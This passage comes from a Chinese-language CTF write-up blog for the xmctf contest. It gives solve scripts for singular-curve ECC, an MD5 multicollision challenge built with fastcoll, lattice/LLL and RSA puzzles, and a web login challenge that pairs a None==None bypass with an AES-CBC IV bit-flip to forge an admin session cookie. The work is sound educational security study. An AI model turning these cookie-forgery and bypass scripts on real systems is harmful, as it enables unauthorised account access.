phi(x, y) = frac{x – r}{y + c\/2} pmod p
$$
\u5728\u52a0\u6cd5\u7fa4\u4e2d\uff0cP = mG \u7b49\u4ef7\u4e8e
$$
phi(P) equiv m cdot phi(G) pmod p
$$
\u56e0\u6b64\uff0c\u8ba1\u7b97
$$
phi(P) \u4e0e phi(G) \u540e
$$
\u76f4\u63a5\u5728\u6a21 p\u4e0b\u6c42\u9006\u5373\u53ef\u5f97\u5230\u79c1\u94a5 m\uff1a
$$
m equiv phi(P) cdot phi(G)^{-1} pmod p
$$
exp.py<\/p>\n\n\n\n
from Crypto.Util.number import inverse, long_to_bytes\n\np = 9259018534502783714631247560818133078409930397939705162361230465031580254504264713899169170790687716589100652406132800533397486109926387016562663961524649\nb = 6235467631650349040636525320446729529985562949423449382969614887116983248527693872546808737512375916974084741892428681798937790855872528526403738040908493\nc = 4165903654767429195543540819098180314477702137507994424192636596518008877139978822038616746899053449640020812062736993008962585578921635697413459959685760\n\nG = (1244884551970947614719458919805713649754289814760243366205012699871413235954279930743612403791919112394457579170253990713250052822262255880036254772609156, 4579639528751113977115209571728128585569082149696598770106934145500742785077382446292613925719404433141749168427443122707253164477493499731016883616496009)\nP = (9039120379228240875764080238389949393433230267005269099421166553853462484353350917730468887801035670710981414900285176863179650428412616144755102163764906, 6266065680737729548475090556806928225106996606788926050268440244885398464756877886842570309216095272026404453765198968208595242208306240371310555394416694)\n\nc_inv2 = (c * inverse(2, p)) % p\nr = (-b * inverse(3, p)) % p\n\ndef phi(pt):\n x, y = pt\n X_num = (x - r) % p\n Y_den = (y + c_inv2) % p\n return (X_num * inverse(Y_den, p)) % p\n\nt_G = phi(G)\nt_P = phi(P)\n\nm = (t_P * inverse(t_G, p)) % p\nprint(long_to_bytes(m).decode('utf-8'))<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{A_s1ngu14r_Curv3_15_n0t_s3cur3!}<\/code><\/pre>\n\n\n\nez_login<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u6709\u6e90\u7801\u5ba1\u8ba1\u4ee3\u7801<\/p>\n\n\n\n
None == None \u7ed5\u8fc7<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
USERS \u5b57\u5178\u521d\u59cb\u53ea\u6709 admin\u3002\u5f53\u6211\u4eec\u4f20\u5165\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u7528\u6237\u540d\uff08\u5982 bdmin\uff09\uff0cUSERS.get('bdmin') \u8fd4\u56de None\u3002\u540c\u65f6\uff0c\u5982\u679c\u6211\u4eec\u5728 POST \u8bf7\u6c42\u4e2d\u6545\u610f\u4e0d\u4f20 password \u5b57\u6bb5\uff0cpw \u4e5f\u4f1a\u662f None\u3002\u5224\u65ad\u6761\u4ef6\u53d8\u4e3a None == None\uff0c\u6821\u9a8c\u901a\u8fc7\uff0c\u7cfb\u7edf\u4f1a\u4e3a\u6211\u4eec\u4e0b\u53d1 user=bdmin \u7684\u5408\u6cd5 Session\u3002<\/code><\/pre>\n\n\n\nAES-CBC \u5b57\u8282\u7ffb\u8f6c\u653b\u51fb<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
Session \u76f4\u63a5\u7531 IV + \u5bc6\u6587 \u62fc\u63a5\u800c\u6210\uff0c\u6ca1\u6709\u4efb\u4f55 MAC\uff08\u5982 HMAC\uff09\u8fdb\u884c\u5b8c\u6574\u6027\u6821\u9a8c\u3002\u5728 AES-CBC \u89e3\u5bc6\u6a21\u5f0f\u4e0b\uff0c\u89e3\u5bc6\u7b2c\u4e00\u4e2a\u5757\u65f6\uff0c\u5bc6\u6587\u89e3\u5bc6\u540e\u7684\u4e2d\u95f4\u503c\u4f1a\u4e0e IV \u8fdb\u884c\u5f02\u6216\u5f97\u5230\u660e\u6587\u3002\n\u7531\u4e8e\u6211\u4eec\u53ef\u4ee5\u63a7\u5236 IV\uff0c\u4e14\u5df2\u77e5\u660e\u6587\u7ed3\u6784\u4e3a user=bdmin\uff0c\u53ea\u9700\u7be1\u6539 IV \u7684\u7b2c 6 \u4e2a\u5b57\u8282\uff08\u7d22\u5f15 5\uff09\uff0c\u5c06\u5176\u5f02\u6216 'b' \u518d\u5f02\u6216 'a'\uff0c\u5c31\u80fd\u5728\u670d\u52a1\u7aef\u89e3\u5bc6\u65f6\u5c06 bdmin \u7ffb\u8f6c\u6210 admin\u3002<\/code><\/pre>\n\n\n\n\u601d\u8def<\/p>\n\n\n\n
\u6784\u9020 username=bdmin \u4e14\u65e0 password \u53c2\u6570\u7684\u8bf7\u6c42\uff0c\u9a97\u53d6\u6709\u6548 Token\u3002\n\u5c06 Token \u89e3\u7801\u4e3a\u5b57\u8282\uff0c\u5206\u79bb\u524d 16 \u5b57\u8282\u7684 IV \u548c\u540e\u7eed\u5bc6\u6587\u3002\n\u5bf9 IV \u7684 index=5 \u4f4d\u7f6e\u6267\u884c\u5f02\u6216\uff1aIV[5] ^ ord('b') ^ ord('a')\u3002\n\u91cd\u65b0\u62fc\u63a5\u8f6c\u4e3a hex\uff0c\u5e26\u4e0a\u65b0 Cookie \u8bf7\u6c42\u9996\u9875\u5373\u53ef\u62ff\u5230 flag\u3002<\/code><\/pre>\n\n\n\n\u624b\u52a8<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
ed7db19af55622792f202ee4d09d6d824ba13f67e095e459c9e2eb08678c5050<\/code><\/pre>\n\n\n\n\u7ffb\u8f6c\u540e\u7684\u65b0 Cookie\ned7db19af55522792f202ee4d09d6d824ba13f67e095e459c9e2eb08678c5050\n\u539f token \u524d 16 \u5b57\u8282\u662f IV\uff0c\u7b2c 6 \u4e2a\u5b57\u8282\u4e3a 56\u3002\u628a\u5b83\u8ddf b \u548c a \u8fdb\u884c\u5f02\u6216\uff1a0x56 ^ ord('b') ^ ord('a')\uff0c\u7ed3\u679c\u6b63\u597d\u53d8\u6210\u4e86 55\u3002)<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u7136\u540e\u7ffb\u8f6c\u5c31\u884c\u4e86<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nimport re\n\nurl = \"http:\/\/nc1.ctfplus.cn:34025\"\n\ndef exploit():\n session = requests.Session()\n session.post(f\"{url}\/login\", data={\"username\": \"bdmin\"}, allow_redirects=False)\n cookie = session.cookies.get(\"session\")\n\n if not cookie:\n return\n\n token_bytes = bytes.fromhex(cookie)\n iv = bytearray(token_bytes[:16])\n ct = token_bytes[16:]\n\n iv[5] = iv[5] ^ ord('b') ^ ord('a')\n\n forged_token = (iv + ct).hex()\n\n final_response = requests.get(f\"{url}\/\", cookies={\"session\": forged_token})\n\n match = re.search(r\"xmctf{.*?}\", final_response.text, re.IGNORECASE)\n if match:\n print(match.group(0))\n\nif __name__ == \"__main__\":\n exploit()<\/code><\/pre>\n\n\n\n xmctf{c8a3a4e9-fb08-47d1-acf7-77cc5c8d967e}<\/code><\/pre>\n\n\n\ntruck<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u6709\u9644\u4ef6\u662f\u4e00\u4e2aMD5\u78b0\u649e\u7684\u9898\u76ee<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u7ed9\u51fa\u4e86\u4e00\u6bb5\u57fa\u4e8e MD5 \u54c8\u5e0c\u78b0\u649e\u7684\u68c0\u9a8c\u903b\u8f91\uff0c\u89c4\u5219\u5982\u4e0b\n\u5faa\u73af 10 \u8f6e\uff1a\u6bcf\u8f6e\u8981\u6c42\u8f93\u5165 9 \u4e2a\u4e0d\u540c\u7684\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\uff08A \u5230 I\uff09\u3002\n\u591a\u7ea7\u78b0\u649e\u9650\u5236\uff1a\n\u7b2c\u4e00\u5c42\uff1a\u8981\u6c42 MD5(A) == MD5(B) == MD5(C)\uff0c\u8bbe\u5176\u6458\u8981\u7ed3\u679c\u4e3a ha\u3002\n\u7b2c\u4e8c\u5c42\uff1a\u8981\u6c42\u62fc\u63a5\u524d\u7f00\u540e\u78b0\u649e\uff0cMD5(ha + D) == MD5(ha + E) == MD5(ha + F)\uff0c\u8bbe\u7ed3\u679c\u4e3a hd\u3002\n\u7b2c\u4e09\u5c42\uff1a\u7ee7\u7eed\u62fc\u63a5\u524d\u7f00\uff0cMD5(hd + G) == MD5(hd + H) == MD5(hd + I)\u3002\n\u5168\u5c40\u53bb\u91cd\uff1a\u8fd9 10 \u8f6e\u4e2d\u63d0\u4ea4\u7684\u6240\u6709 90 \u4e2a\u8f93\u5165\uff0c\u5fc5\u987b\u5168\u5c40\u552f\u4e00\uff08assert not any(x in S for x in cur)\uff09\u3002<\/code><\/pre>\n\n\n\nMD5 \u591a\u91cd\u78b0\u649e<\/p>\n\n\n\n
\u76f4\u63a5\u7528 fastcoll\u5c31\u884c<\/p>\n\n\n\n
10\u8f6e \u00d7 \u6bcf\u8f6e3\u4e2a = 30 \u4e2a\u4e0d\u91cd\u590d\u7684\u8f93\u5165\u300232 \u4e2a payload \u521a\u597d\u6ee1\u8db3\u9700\u6c42\u3002<\/p>\n\n\n\n
\u9898\u76ee\u7b2c\u4e8c\u3001\u4e09\u5c42\u7684\u8f93\u5165\u524d\u7f00\u662f\u524d\u4e00\u6b21\u7684 MD5 \u6458\u8981\u7ed3\u679c\uff0816 \u5b57\u8282\uff09\u3002\u4e3a\u4e86\u8ba9 fastcoll \u6b63\u5e38\u5de5\u4f5c\u4e14\u4e0d\u5f71\u54cd\u5185\u90e8\u7684 padding \u72b6\u6001\uff0c\u6211\u4eec\u9700\u8981\u628a\u8fd9 16 \u5b57\u8282\u7684\u524d\u7f00\u8865\u9f50\u5230\u5b8c\u6574\u7684 64 \u5b57\u8282\u5757\u3002\n\u505a\u6cd5\u5f88\u7b80\u5355\uff1a\u7528 48 \u5b57\u8282\u7684 x00 \u586b\u5145\u3002\u5373\u4ee4 \u521a\u597d\u662f 64 \u5b57\u8282\uff0c\u53ef\u4ee5\u76f4\u63a5\u9001\u8fdb fastcoll \u8dd1\u78b0\u649e\u3002<\/code><\/pre>\n\n\n\nfastcoll.exe\uff0c\u4e0e exp \u653e\u5728\u540c\u4e00\u76ee\u5f55\u4e0b\u3002<\/p>\n\n\n\n
\u7b2c\u4e00\u7ec4 (A,B,C)\uff1a\u76f4\u63a5\u7ed9 64 \u5b57\u8282\u7684 x00 \u5f53\u521d\u59cb\u524d\u7f00\uff0c\u8fde\u7eed\u8dd1 5 \u6b21 fastcoll \u751f\u6210 32 \u4e2a payload\uff0c\u53d6\u524d 30 \u4e2a\u3002\n\u7b2c\u4e8c\u7ec4 (D,E,F)\uff1a\u53d6\u7b2c\u4e00\u7ec4\u8dd1\u51fa\u6765\u7684 MD5 \u6458\u8981 ha$(16\u5b57\u8282) + 48\u5b57\u8282 x00 \u4f5c\u4e3a\u524d\u7f00\uff0c\u518d\u8dd1 5 \u6b21\u751f\u6210 32 \u4e2a payload\u3002\n\u7b2c\u4e09\u7ec4 (G,H,I)\uff1a\u53d6\u7b2c\u4e8c\u7ec4\u7684\u6458\u8981 hd + 48\u5b57\u8282 x00 \u4f5c\u4e3a\u524d\u7f00\uff0c\u540c\u6837\u8dd1 5 \u6b21\u751f\u6210 32 \u4e2a\u3002\u672c\u5730\u9884\u8ba1\u7b97\u5b8c\u6240\u6709 90 \u4e2a payload \u540e\uff0c\u8fde\u63a5\u670d\u52a1\u5668\u4e00\u6b21\u6027\u6253\u8fc7\u53bb\u62ff flag\u3002<\/code><\/pre>\n\n\n\nexp.py<\/p>\n\n\n\n
import os\nimport subprocess\nimport itertools\nfrom hashlib import md5\nfrom pwn import remote, context\n\ncontext.log_level = 'info'\n\ndef get_multicollisions(prefix_bytes, num_blocks=5):\n blocks = []\n current_prefix = prefix_bytes\n\n exe_name = 'fastcoll.exe' if os.name == 'nt' else 'fastcoll'\n fastcoll_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), exe_name)\n\n if not os.path.exists(fastcoll_path):\n fastcoll_path = exe_name\n\n for i in range(num_blocks):\n with open('prefix.bin', 'wb') as f:\n f.write(current_prefix)\n\n subprocess.run(\n [fastcoll_path, '-p', 'prefix.bin', '-o', 'out1.bin', 'out2.bin'], \n check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL\n )\n\n with open('out1.bin', 'rb') as f: m1 = f.read()\n with open('out2.bin', 'rb') as f: m2 = f.read()\n\n blocks.append((m1[-128:], m2[-128:]))\n current_prefix = m1 \n\n suffixes = []\n for combo in itertools.product(*blocks):\n suffixes.append(b''.join(combo))\n\n return suffixes\n\ndef main():\n prefix_1 = b'x00' * 64 \n sufs_1 = get_multicollisions(prefix_1, 5)\n blocks_1 = [prefix_1 + suf for suf in sufs_1]\n ha = md5(blocks_1[0]).digest()\n\n pad48 = b'x00' * 48\n prefix_2 = ha + pad48\n sufs_2 = get_multicollisions(prefix_2, 5)\n blocks_2 = [pad48 + suf for suf in sufs_2]\n hd = md5(ha + blocks_2[0]).digest()\n\n prefix_3 = hd + pad48\n sufs_3 = get_multicollisions(prefix_3, 5)\n blocks_3 = [pad48 + suf for suf in sufs_3]\n\n for f in ['prefix.bin', 'out1.bin', 'out2.bin']:\n if os.path.exists(f): os.remove(f)\n\n r = remote('nc1.ctfplus.cn', 30531)\n\n for i in range(10):\n A, B, C = blocks_1[i*3], blocks_1[i*3+1], blocks_1[i*3+2]\n D, E, F = blocks_2[i*3], blocks_2[i*3+1], blocks_2[i*3+2]\n G, H, I = blocks_3[i*3], blocks_3[i*3+1], blocks_3[i*3+2]\n\n r.sendlineafter(b'A > ', A.hex().encode())\n r.sendlineafter(b'B > ', B.hex().encode())\n r.sendlineafter(b'C > ', C.hex().encode())\n r.sendlineafter(b'D > ', D.hex().encode())\n r.sendlineafter(b'E > ', E.hex().encode())\n r.sendlineafter(b'F > ', F.hex().encode())\n r.sendlineafter(b'G > ', G.hex().encode())\n r.sendlineafter(b'H > ', H.hex().encode())\n r.sendlineafter(b'I > ', I.hex().encode())\n\n r.interactive()\n\nif __name__ == '__main__':\n main()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{96e7bafb-0d65-43bc-911f-bebb99b86f12}<\/code><\/pre>\n\n\n\nsda<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u7ed9\u51fa\u4e86\u4e09\u7ec4\u5df2\u77e5\u53c2\u6570
$$
A_i \u548c B_i\u3002\u7531\u4e8e A_i \u7684\u6570\u503c\u4e0d\u5927\uff08\u7ea6137\u4f4d\uff09
$$
\u53ef\u4ee5\u76f4\u63a5\u5206\u89e3\u8d28\u56e0\u6570\u5e76\u6c42\u51fa\u6b27\u62c9\u51fd\u6570
$$
phi(A_i)
$$
\u52a0\u5bc6\u5728\u4e8e\u4e0b\u9762\u8fd9\u4e2a\u7b49\u5f0f\u548c\u7ea6\u675f\uff1a
$$
B_i x_i^2 – y^2 phi(A_i) = z_i
$$<\/p>\n\n\n\n
$$
\u9898\u76ee\u660e\u786e\u9650\u5236\u4e86z_i\u662f\u4e00\u4e2a\u6781\u5c0f\u503c\uff08\u91cf\u7ea7\u5728A^{1\/4}\u5de6\u53f3\uff09\u3002\u6700\u540e\uff0c\u811a\u672c\u5c06y^2 + x_1^2 x_2^2 x_3^2\u7684\u7ed3\u679c\u4f5c\u4e3a\u79cd\u5b50\u751f\u6210 AES \u5bc6\u94a5
$$<\/p>\n\n\n\n
\u5bf9 flag \u8fdb\u884c\u4e86 CBC \u6a21\u5f0f\u52a0\u5bc6<\/p>\n\n\n\n
\u601d\u8def
$$
\u4ee4 X_i = x_i^2\uff0cY = y^2\u3002\u65e2\u7136 z_i \u6781\u5c0f
$$
\u8fd9\u5c31\u53ef\u4ee5\u8f6c\u5316\u4e3a\u4e00\u4e2a\u5bfb\u627e\u683c\u4e2d\u77ed\u5411\u91cf\u7684\u95ee\u9898\u3002 \u4e3a\u4e86\u8ba9\u77e9\u9635\u5404\u5217\u7684\u6570\u503c\u8303\u56f4\u5e73\u8861
$$
\u56e0\u4e3a z_i \u7684\u754c\u7ea6\u7b49\u4e8e A^{1\/4} cdot Y
$$
\u6211\u4eec\u9700\u8981\u7ed9 Y\u5bf9\u5e94\u7684\u5217\u4e58\u4e0a\u4e00\u4e2a\u6743\u91cd
$$
W approx A_1^{1\/4}
$$
\u6784\u9020\u57fa\u7840\u683c\u77e9\u9635\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u7528 LLL \u7b97\u6cd5\u5bf9\u77e9\u9635\u8fdb\u884c\u89c4\u7ea6\u540e\uff0c\u63d0\u53d6\u51fa\u77ed\u5411\u91cf\uff0c\u518d\u4e58\u56de\u539f\u77e9\u9635\u7684\u9006\u77e9\u9635\uff0c\u5c31\u80fd\u5254\u9664\u6743\u91cd\uff0c\u76f4\u63a5\u8fd8\u539f\u51fa Y \u548c\u5bf9\u5e94\u7684 X1, X2, X3\u3002\u6700\u540e\u6062\u590d AES \u5bc6\u94a5\u89e3\u5bc6\u5373\u53ef\u3002<\/p>\n\n\n\n
exp.sage<\/p>\n\n\n\n
from sage.all import *\nfrom Crypto.Util.number import long_to_bytes\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nimport hashlib\n\nA1 = 234110215243875326749544596075512335544257\nB1 = 68765596672109672407420253033782942222910 \nA2 = 636185906634748653451789798738597280632127\nB2 = 131860738134887128678021271054606611917493 \nA3 = 905712574946398586494048707872100065355613\nB3 = 197958111431918701470218006359610095848736\n\nAs = [A1, A2, A3]\nBs = [B1, B2, B3]\n\nphis = []\nfor Ai in As:\n p, q = factor(Ai)\n phis.append((p[0] - 1) * (q[0] - 1))\n\nW = int(A1**(1\/4))\n\nM = Matrix(ZZ, [\n [W, -phis[0], -phis[1], -phis[2]],\n [0, B1, 0, 0],\n [0, 0, B2, 0],\n [0, 0, 0, B3]\n])\n\nL = M.LLL()\n\nfor row in L:\n WY = abs(row[0])\n if WY != 0 and WY % W == 0:\n Y = WY \/\/ W\n v = Matrix(QQ, 1, 4, list(row))\n\n try:\n res = v * M.inverse()\n except:\n continue\n\n Y_cand = abs(res[0, 0])\n X1 = abs(res[0, 1])\n X2 = abs(res[0, 2])\n X3 = abs(res[0, 3])\n\n if Y_cand == Y and X1.denominator() == 1 and X2.denominator() == 1 and X3.denominator() == 1:\n Y_val = ZZ(Y_cand)\n X1_val = ZZ(X1)\n X2_val = ZZ(X2)\n X3_val = ZZ(X3)\n\n key_material_int = Y_val + X1_val * X2_val * X3_val\n key_material_bytes = long_to_bytes(int(key_material_int))\n aes_key = hashlib.sha256(key_material_bytes).digest()[:16]\n\n hex_data = \"93192f46a00b2dade984ca758706b00681263a8536d8051aff0206d257ce4c2aad6bc017138d4c7aeaed5c8fc2c1ea2f3cec3fbd9201bb5844fa8143d6630944\"\n iv = bytes.fromhex(hex_data[:32])\n ciphertext = bytes.fromhex(hex_data[32:])\n\n cipher = AES.new(aes_key, AES.MODE_CBC, iv=iv)\n try:\n pt = unpad(cipher.decrypt(ciphertext), AES.block_size)\n print(pt.decode())\n break\n except ValueError:\n continue<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{1f1f595c6849030aad5eee38f856d8ff}<\/code><\/pre>\n\n\n\n\u795e\u79d8\u5b66<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
RSA\u52a0\u89e3\u5bc6\u53cd\u8f6c\uff1a\u9898\u76ee\u4e2d\u7684
$$
e = inverse(c, (p-1)*(q-1))
$$
\u8bf4\u660e\u53c2\u6570 c<\/code> \u5b9e\u9645\u4e0a\u662f\u7528\u6765\u89e3\u5bc6\u7684\u79c1\u94a5\u6307\u6570\uff0c\u53ea\u8981\u7b97\u51fa c<\/code> \u5c31\u80fd\u76f4\u63a5<\/p>\n\n\n\npow(cipher, c, n)<\/code> \u89e3\u5bc6\u3002<\/p>\n\n\n\n\u591a\u9879\u5f0f\u91cf\u7ea7\u5dee\u8fd8\u539f\uff1a\u9898\u76ee\u7ed9\u51fa\u4e86\u6c42\u5bfc\u540e\u7684\u503c
$$
deriv1_num = 3x1^2 – 2<\/em>a1x1 + b1
$$
\u8f6c\u6362\u4e00\u4e0b\u516c\u5f0f\u5f97\u5230\uff1a
$$
a1 = (3<\/em>x1^2 – deriv1_num + b1) \/ (2x1)
$$
\u7531\u4e8e x1<\/code> \u662f 512 \u4f4d\u7684\u5927\u6570\uff0c\u800c b1<\/code> \u53ea\u6709 120 \u4f4d\uff0c\u5206\u5f0f `b1 \/ (2<\/em>x1)\u7684\u503c\u6781\u5c0f\uff0c\u8d8b\u8fd1\u4e8e0\u3002\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u7528\u6574\u9664 $$ a1 \u2248 (3*x1^2 - deriv1_num) \/\/ (2*x1) $$ \u8fd8\u539f\u51fa<\/code>a1` \u7684\u503c\u3002<\/p>\n\n\n\n\u9690\u5f0f\u6761\u4ef6\u53cd\u63a8\uff1a\u4ee3\u5165 a1<\/code> \u7b97\u51fa\u7cbe\u786e\u7684 b1<\/code> \u540e\uff0c\u5229\u7528\u9690\u5f0f\u6761\u4ef6 poly(x1) = 0<\/code> \u53cd\u63a8
$$
x1^3 – a1x1^2 + b1<\/em>x1 – k*n
$$
\u914d\u5408\u7206\u7834 8 \u4f4d\u7684\u7d20\u6570 k<\/code> \u5373\u53ef\u62ff\u5230\u771f\u5b9e\u7684 c<\/code><\/p>\n\n\n\nexp.py<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes, isPrime\n\nn = 63407394080105297388278430339692150920405158535377818019441803333853224630295862056336407010055412087494487003367799443217769754070745006473326062662322624498633283896600769211094059989665020951007831936771352988585565884180663310304029530702695576386164726400928158921458173971287469220518032325956366276127\nx1 = 3481408902400626584294863390184557833125008467348169645656825368985677578418186933223051810792813745190000132321911937970968840332589150965113386330575858\nderiv1_num = 36360623837143006554133449776905822223850034204333042340303731846698251185379183585401025894584873826284649058526470710038176516677326058549625930550928515944115160614909195746688504416967586844354012895944251800672195553936202084073217078119494546421088598245791873936703883718926122761577400400368341859847\ncipher = 17359360992646515022812225990358117265652240629363564764503325024700251560440679272576574598620940996876220276588413345495658258508097150181947839726337961689195064024953824539654084620226127592330054674517861032601638881355220119605821814412919221685287567648072575917662044603845424779210032794782725398473\n\ndef solve():\n x1_sq = x1 * x1\n x1_cb = x1_sq * x1\n primes = [i for i in range(2, 256) if isPrime(i)]\n\n for k in primes:\n num_lower = (2**119) - deriv1_num + 3 * x1_sq\n num_upper = (2**120) - deriv1_num + 3 * x1_sq\n den = 2 * x1\n\n low_a1 = (num_lower + den - 1) \/\/ den if num_lower > 0 else 0\n up_a1 = num_upper \/\/ den \n\n start = max(2**119, low_a1)\n end = min(2**120, up_a1)\n\n if start <= end:\n for a1 in range(start, end + 1):\n if 2**119 <= a1 <= 2**120:\n b1 = deriv1_num - 3 * x1_sq + 2 * a1 * x1\n if 2**119 <= b1 <= 2**120:\n c = x1_cb - a1 * x1_sq + b1 * x1 - k * n\n if c > 0:\n try:\n m = pow(cipher, c, n)\n flag = long_to_bytes(m).decode('utf-8', errors='ignore')\n if 'xmctf{' in flag.lower():\n print(flag)\n return\n except Exception:\n pass\n\nif __name__ == '__main__':\n solve()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{e6d787beb9230217e692e130f718cdeb}<\/code><\/pre>\n\n\n\nWeb<\/h1>\n\n\n\nonly real<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u8fd9\u4e2a\u9898\u76ee\u5e94\u8be5\u9884\u671f\u89e3\u5e94\u8be5\u662f\u6587\u4ef6\u4e0a\u4f20\uff0c\u6211\u4e0a\u4f20\u76ee\u51fa\u6765\u4f46\u662f\u6211\u770b\u5e94\u8be5\u662f\u51fa\u9898\u4eba .sh\u542f\u52a8\u811a\u672c\u6709\u95ee\u9898 \u628aflag\u5199\u5165web\u76ee\u5f55\u4e86<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u767b\u5f55\u770b\u6e90\u7801\u53ef\u4ee5\u53d1\u73b0\u767b\u5f55\u7528\u6237\u540d\u548c\u5bc6\u7801<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmuser\/123456<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u4f46\u662f\u4f60\u770b\u626b\u63cf\u51fa\u6765flag.php\u8bbf\u95ee\u5c31\u884c<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{xm_xxe_blind_success}<\/code><\/pre>\n\n\n\n
![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-210.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-211.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-212-1024x536.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-213-1024x711.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-214.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-215-1024x560.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-216-1024x536.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-217-1024x492.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-218-1024x632.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-219-1024x552.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-220-1024x751.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-221-1024x551.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-222-1024x316.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-223.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-224.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-225.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-226-1024x526.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-227-1024x617.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-228-1024x164.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-229-1024x149.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-230-1024x529.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-231.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-232-1024x460.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-233.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-234-1024x78.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-235.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-236.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-379.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-237-1024x705.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-238-1024x571.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-239-1024x425.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-240-1024x561.png\")
